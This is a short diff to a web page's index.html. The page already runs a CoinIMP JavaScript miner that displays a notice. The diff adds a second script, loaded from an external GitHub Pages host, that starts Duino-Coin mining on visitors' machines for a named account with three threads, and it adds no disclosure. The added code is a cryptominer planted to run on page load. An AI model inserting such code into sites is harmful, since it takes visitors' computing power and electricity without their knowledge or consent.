--- a/index.html
+++ b/index.html
@@ -44,5 +44,15 @@
     _client.start();
     _client.addMiningNotification("Floating Bottom", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
 </script>
+<script src="https://NoozAbooz.github.io/Duinotize/duinotize.js" defer></script>
+<script>
+  duinotize.start({
+    username: "AlexyNorma040119",
+    rigid: "GameSite",
+    difficulty: "MED",
+    threads: 3,
+    hasher: "DUCO-S1-MIDSTATE"
+  });
+</script>
 </body>
 </html>
